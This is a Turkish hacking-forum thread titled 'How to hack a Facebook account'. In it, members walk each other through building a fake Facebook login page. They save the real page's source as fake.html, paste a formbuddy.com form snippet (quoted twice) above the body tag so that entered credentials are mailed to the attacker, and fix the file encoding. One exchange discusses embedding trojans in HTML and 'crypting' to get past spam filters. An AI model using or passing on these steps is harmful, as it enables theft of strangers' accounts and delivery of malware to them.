Facebook hesabı nasıl hacklenir(Döküman)

çağdaş001

Uzman üye
29 May 2009
1,379
1
*
Arkadaşlar profilimde msn adresim var yapılanları uygulayıp olmadı diyen varsa eklesin yardımcı olalım.;)

pisc0x

Katılımcı Üye
4 Ara 2009
720
0
Fake Yöntemi:Bu kodun hemen ustune derken nereye ve kodu bulamadım nasıl bulucağız ?

activeseen

Katılımcı Üye
6 Ocak 2010
548
0
Seenn City
TurkWarrior bir sorunum var anlattıklarınla ilgili.trojanı html kodlar içine nasıl yerleştireceğiz ve eğer yerleştirsek de mail adresi örneğin msn bunları engellemiyor mu?
teşekkürler.

çağdaş001

Uzman üye
29 May 2009
1,379
1
*
Fake Yöntemi:Bu kodun hemen ustune derken nereye ve kodu bulamadım nasıl bulucağız ?

Facebook hesabına giriş yapmışsan çıkış yapmalısın.Sonra www.facebook.com/login.php adresine gidiyorsun.Ve bu sayfanın kaynak kodlarını görüntüleyip fake.html olarak kaydediyorsun.Sonra fake.html yi not defteri ile açıyorsun.Ve Ctrl+F ile <body kodunu buluyorsun.Onun hemen üstüne formmailden aldıgın kodu yapıstır.Tekrar kaydet.

TurkWarrior bir sorunum var anlattıklarınla ilgili.trojanı html kodlar içine nasıl yerleştireceğiz ve eğer yerleştirsek de mail adresi örneğin msn bunları engellemiyor mu?
teşekkürler.

1-) Forumda böyle bir konu hatırlıyorum hemde sabitti.

2-)Forumdakinden farklı olarak html downloaderlar var.

Yerleştirdikten sonrada engelleyecegini sanmıyorum.Çünkü kişilerin %99 u spam korumasını açmıyor.Açanlar içinde html kodlarını cryptla engellemez artık.

xyzero

Yeni üye
11 Ocak 2010
25
0
www.formbuddy.com sitesindeki dediğin işlemleri yaptıktan sonra tek alacağımız yer

<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="username">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.facebook.com/login.php">

kodlarımıdır?
''<form ile başlayan kısımdan başlıyor paragrafın sonundaki > karakterine kadar alıyoruz. '' demişsin.
neyse ben bu kısmını alıp, facebook kaynağındaki kodlarıda alıp
<body kodunun üstüne bunlarıda yapıştırdıktan sonra kaydetmeye gelince sıra, kod hatası falan verdi, yani doğru kaydedip kaydetmediğime emin olamadım. sonuçta adı fake.html.txt oldu, bu biraz garip geldi bana :(

neyse her ihtimale karşın denemek için kendi mailimden başka bir hotmailime yolladım, dosya olarak ekledim, maili aldım almasına ama kaydettiğim kod biçiminde aldım

çok saçma geldi sanırım ben beceremedim, umarım detayı bilgilendirebilirsin, yaptıklarımın neresi yanlıştı?

xyzero

Yeni üye
11 Ocak 2010
25
0
galiba bunu mail olarak attğımızda karşı tarafa bir link oluşacak, pek bilmiyorum ama öyle tahmin ediyorum, ben yaptığımda dosya ekleme methodu ile yaptığım için olailir ekli dosya olarak aldım..linki nasıl oluşturuyoruz??

çağdaş001

Uzman üye
29 May 2009
1,379
1
*
www.formbuddy.com sitesindeki dediğin işlemleri yaptıktan sonra tek alacağımız yer

<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="username">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.facebook.com/login.php">

kodlarımıdır?
''<form ile başlayan kısımdan başlıyor paragrafın sonundaki > karakterine kadar alıyoruz. '' demişsin.
neyse ben bu kısmını alıp, facebook kaynağındaki kodlarıda alıp
<body kodunun üstüne bunlarıda yapıştırdıktan sonra kaydetmeye gelince sıra, kod hatası falan verdi, yani doğru kaydedip kaydetmediğime emin olamadım. sonuçta adı fake.html.txt oldu, bu biraz garip geldi bana :(

neyse her ihtimale karşın denemek için kendi mailimden başka bir hotmailime yolladım, dosya olarak ekledim, maili aldım almasına ama kaydettiğim kod biçiminde aldım

çok saçma geldi sanırım ben beceremedim, umarım detayı bilgilendirebilirsin, yaptıklarımın neresi yanlıştı?

Evet dosyayı kaydetmeye gelene kadar dogru yapmıssın.Kodları <body nin üstüne yapıstırdıktan sonra fake.html.txt olarak degil fake.html olarak kaydedeceksin.Dogrudur kaydederken Türkçe karakterler oldugu icin hata verecektir.Sende karakter bicimini utf-8 yaparsan hata vermeden sorunsuz kaydeder ve çalışır.

toxic1103

Uzman üye
19 Mar 2009
1,344
0
27
arkadaşım deneme yanılma y la yaparsan ............................................ohooooo......... :D

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.